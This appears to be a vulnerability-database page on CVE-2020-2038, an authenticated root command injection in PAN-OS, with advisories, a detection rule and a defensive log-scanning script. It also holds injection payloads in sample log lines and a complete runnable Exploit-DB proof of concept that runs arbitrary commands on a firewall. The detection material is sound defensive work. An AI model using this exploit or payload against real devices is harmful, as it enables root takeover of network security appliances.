CVE-2020-2038
Published 2020-09-09
Priority: P2 · CVSS 3.1 base score 7.2 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploit: public (Exploit-DB and Metasploit entries below)
EPSS: 86.09% (99.7th percentile)
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.
Affected
3 version ranges (the sources spell the vendor as palo_alto_networks, paloaltonetworks and paloalto, but list identical ranges; merged here, and an empty paloalto row dropped)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| Palo Alto Networks | PAN-OS | >= 9.0.0 < 9.0.10 | 9.0.10 |
| Palo Alto Networks | PAN-OS | >= 9.1.0 < 9.1.4 | 9.1.4 |
| Palo Alto Networks | PAN-OS | >= 10.0.0 < 10.0.1 | 10.0.1 |
No other release train is listed as affected in the vendor advisory.
Detection & IOCs (extracted from the sources quoted below)
Rule (ET Open sid 2038688; the source files it under "snort", but the http.method / http.uri sticky buffers are Suricata syntax):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT PAN-OS OS Command Injecton Attempt Inbound (CVE-2020-2038)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"?cmd="; content:"|3c 21 5b|CDATA|5b 7c 7c|"; fast_pattern; reference:cve,2020-2038; classtype:attempted-admin; sid:2038688; rev:2; metadata:attack_target Server, created_at 2022_08_31, cve CVE_2020_2038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Key byte pattern: |3c 21 5b|CDATA|5b 7c 7c|, i.e. the ASCII string <![CDATA[|| (an XML CDATA opener followed by the shell || operator). Suricata's http.uri buffer is the normalized, percent-decoded URI, so the rule also matches the encoded form %3C%21%5BCDATA%5B%7C%7C.
- The exploit drives the PAN-OS management XML API with an HTTP GET to /api carrying cmd=, type=op and key= (a valid API key). On management-interface traffic, log every request to /api with type=op and inspect the cmd value; the XML API also accepts POST, which the ET rule (GET only) does not cover.
- The injected OS command rides in the cmd parameter and begins with a CDATA opener followed by the shell || operator; the byte pattern |3c 21 5b|CDATA|5b 7c 7c| (<![CDATA[||) in the decoded URI is a high-confidence indicator of an exploitation attempt. Match on the decoded value, not the raw query string, or a percent-encoded payload slips past.
- Palo Alto's own Threat Prevention signature (Unique Threat ID 59954) can be enabled on GlobalProtect portal/gateway/VPN traffic as a compensating control. It only inspects traffic that crosses the dataplane under a Vulnerability Protection profile; requests that reach the dedicated MGT port are not inspected, so the signature does not replace restricting access to the management interface.
- A Metasploit module exists for this vulnerability (exploit/linux/http/panos_op_cmd_exec); it exercises the same /api type=op channel, so the byte-pattern rule above applies to it as well.
- Exploitation is authenticated: the attacker needs valid administrator credentials or an existing API key (the XML API issues a key in exchange for a username and password, and the PoC presents that key in key=). Stolen, weak or shared admin credentials are therefore the prerequisite attack vector.
- The attack surface is the PAN-OS management web interface; restricting network access to it (dedicated management network, permitted source addresses) per Palo Alto best practices significantly reduces exposure.
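The two indicators above, written out as runnable detection logic. This is an added example for this page, not code from any of the sources listed: it assumes combined-log-format request lines (Apache/nginx style) from a reverse proxy or web log in front of the management interface, and the sample lines are constructed, not captured traffic. It mirrors the ET rule (path /api, type=op, cmd starting with <![CDATA[||) but decodes the query itself, so single- and double-percent-encoded payloads are caught, and it applies the check to POST as well as GET.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Byte pattern from ET Open sid 2038688: |3c 21 5b|CDATA|5b 7c 7c| == "<![CDATA[||"
INJECTION_PREFIX = "<![CDATA[||"

# Request line inside the quoted field of a combined-log-format entry.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def classify_request(method: str, uri: str) -> str:
    """Classify one request against the PAN-OS management XML API.

    Returns 'exploit' for the CVE-2020-2038 injection shape (op command whose
    cmd value begins with <![CDATA[|| after percent-decoding), 'op' for any
    other operational-command call (worth logging on a management interface),
    'keygen' for API-key generation, and 'none' otherwise. `method` is kept
    because, unlike the ET rule, the check is not limited to GET: the XML API
    accepts POST too, so the same verdict is returned for either.
    """
    parts = urlsplit(uri)
    if parts.path.rstrip("/") != "/api":
        return "none"
    qs = parse_qs(parts.query, keep_blank_values=True)
    api_type = qs.get("type", [""])[0]
    # parse_qs decodes once; decode a second time so a double-encoded
    # %253C%2521%255BCDATA... does not evade a plain string match.
    cmd = unquote(qs.get("cmd", [""])[0])
    if api_type == "keygen":
        return "keygen"
    if api_type == "op":
        return "exploit" if cmd.lstrip().startswith(INJECTION_PREFIX) else "op"
    return "none"


def scan_log(lines):
    """Yield (line_no, verdict, uri) for every line that touches the API."""
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m["method"], m["uri"])
        if verdict != "none":
            yield n, verdict, m["uri"]


# Constructed sample log lines (not real traffic): key generation, a benign op
# call, a plain-text injection, the same injection percent-encoded, and an
# unrelated request that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Sep/2020:10:00:00 +0000] "GET /api/?type=keygen&user=admin&password=REDACTED HTTP/1.1" 200 312',
    '10.0.0.5 - - [09/Sep/2020:10:00:01 +0000] "GET /api/?type=op&cmd=<show><system><info></info></system></show>&key=K HTTP/1.1" 200 2048',
    '10.0.0.9 - - [09/Sep/2020:10:00:02 +0000] "GET /api/?type=op&cmd=<![CDATA[||id]]>&key=K HTTP/1.1" 200 150',
    '10.0.0.9 - - [09/Sep/2020:10:00:03 +0000] "GET /api/?type=op&cmd=%3C%21%5BCDATA%5B%7C%7Cid%5D%5D%3E&key=K HTTP/1.1" 200 150',
    '10.0.0.9 - - [09/Sep/2020:10:00:04 +0000] "GET /php/login.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for n, verdict, uri in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict:8s} {uri}")
```

On a real deployment the keygen hits are worth keeping too: a keygen from an unexpected source address immediately followed by an op call is the credential-to-exploit sequence this CVE requires.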
CVSS provenance
NVD v3.1: 7.2 HIGH · CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (PR:H reflects the administrator-credential prerequisite; C/I/A are all High because the injected commands run as root)
NVD v2.0: 9.0 · AV:N/AC:L/Au:S/C:C/I:C/A:C (the source labels this CRITICAL, but the v2 scale has no Critical band; 7.0 to 10.0 is HIGH)
GHSA
GHSA-qq25-3qfm-wpjj · ghsa_unreviewed · 2022-05-24 · HIGH · CWE-78
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.
Palo Alto Networks advisory
PAN-OS: OS command injection vulnerability in the management web interface
vendor_paloalto · 2020-09-09 · CVSS 7.2 · CWE-78
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges.
Affected products: PAN-OS
Solution: This issue is fixed in PAN-OS 9.0.10, PAN-OS 9.1.4, PAN-OS 10.0.1, and all later PAN-OS versions.
Workaround: Until PAN-OS software is upgraded to a fixed version, enabling signatures for Unique Threat ID 59954 on traffic destined for the GlobalProtect portal, gateway, or VPN will block attacks against CVE-2020-2038.
This issue impacts the PAN-OS management web interface but you can mitigate the impact of this issue by following best practices for securing the PAN-OS management web interface. Please review the
Suricata
ET EXPLOIT PAN-OS OS Command Injecton Attempt Inbound (CVE-2020-2038)
suricata · ET Open sid 2038688 · 2022-08-31 · CVSS 7.2
Rule: quoted in full under Detection & IOCs above.
Exploit-DB
PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
exploitdb · 2022-08-09 · CVSS 7.2
The Exploit-DB listing is excerpted on this page and cut off partway through; the excerpt below is completed so that it runs. Imports, the API-key step and main() are not in the excerpt: the key is obtained with the standard PAN-OS XML API keygen call, and the payload is rebuilt from the <![CDATA[|| pattern that the detection rule above matches on.

```python
# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-08-13
# Exploit Author: UnD3sc0n0c1d0
# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038
# Category: Web Application
# Version: 8.8.8.81111'
import getopt
import re
import sys
import requests
import urllib3

urllib3.disable_warnings()  # the PoC passes verify=False; silence the TLS warning


def get_apikey(target, user, password):
    # Standard XML API key generation (not shown in the excerpt):
    # GET /api/?type=keygen&user=<admin>&password=<pw> -> <key>...</key>
    r = requests.get(target + 'api', params={'type': 'keygen', 'user': user,
                                            'password': password}, verify=False)
    m = re.search(r'<key>(.*?)</key>', r.text)
    return m.group(1) if m else sys.exit('key generation failed: ' + r.text)


def run_command(target, apikey, command):
    # type=op is the operational-command API; the CDATA opener plus shell ||
    # breaks out of the command PAN-OS builds from cmd and runs as root.
    # Payload shape reconstructed from the detection signature; the excerpt's own line is missing.
    payload = '<![CDATA[||' + command + ']]>'
    parameters = {'cmd': payload, 'type': 'op', 'key': apikey}
    response = requests.get(target + 'api', params=parameters, verify=False)
    print(response.text[50:-20])  # strip the XML envelope, as in the original


def usage():
    print('\nusage: CVE-2020-2038.py\n\n')
    print('arguments:')
    print(' -h show this help message and exit')
    print(' -t target URL (ex: http://vulnerable.host/)')
    print(' -u target administrator user')
    print(' -p password of the defined user account')
    print(' -c command you want to execute on the target\n')


def main(argv):
    # The original main() is cut off in the excerpt; this follows the flags usage() lists.
    opts = dict(getopt.getopt(argv, 'ht:u:p:c:')[0])
    if '-h' in opts or not all(k in opts for k in ('-t', '-u', '-p', '-c')):
        usage()
        sys.exit(1)
    target = opts['-t'] if opts['-t'].endswith('/') else opts['-t'] + '/'
    run_command(target, get_apikey(target, opts['-u'], opts['-p']), opts['-c'])


if __name__ == '__main__':
    main(sys.argv[1:])
```
Metasploit
Palo Alto Networks Authenticated Remote Code Execution
metasploit · exploit/linux/http/panos_op_cmd_exec
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10.
Qualys
PAN-OS Critical Buffer Overflow Vulnerability (CVE-2020-2040) – Automatically Discover, Prioritize and Remediate Using Qualys VMDR®
blogs_qualys · 2020-09-22 · covers CVE-2020-2040 (CVSS 9.8), a different bulletin from the same disclosure day, not CVE-2020-2038
On Sept 9, 2020, Palo Alto Networks published nine security bulletins addressing vulnerabilities in PAN-OS operating system versions 8.0 or later. One of the nine CVEs released, CVE-2020-2040, received a critical severity rating score of 9.8 based on the CVSS v3 Scoring system.
PAN-OS devices are vulnerable to CVE-2020-2040 when a Captive Portal or multi-factor authentication interface is enabled. Once exploited, an unauthenticated user can gain root privileges by sending a malicious request to the PAN-OS device. This vulnerability is rated as critical mainly for two reasons. First, it doesn't require any authentication; and second, it has the potential to disrupt system processes and execute arbitrary cod
Tenable
CVE-2020-2040: Critical Buffer Overflow Vulnerability in PAN-OS Devices Disclosed
blogs_tenable · 2020-09-10 · CVSS 9.8 · CRITICAL · covers CVE-2020-2040, not CVE-2020-2038
References
- https://security.paloaltonetworks.com/CVE-2020-2038
- http://packetstormsecurity.com/files/168008/PAN-OS-10.0-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/168408/Palo-Alto-Networks-Authenticated-Remote-Code-Execution.html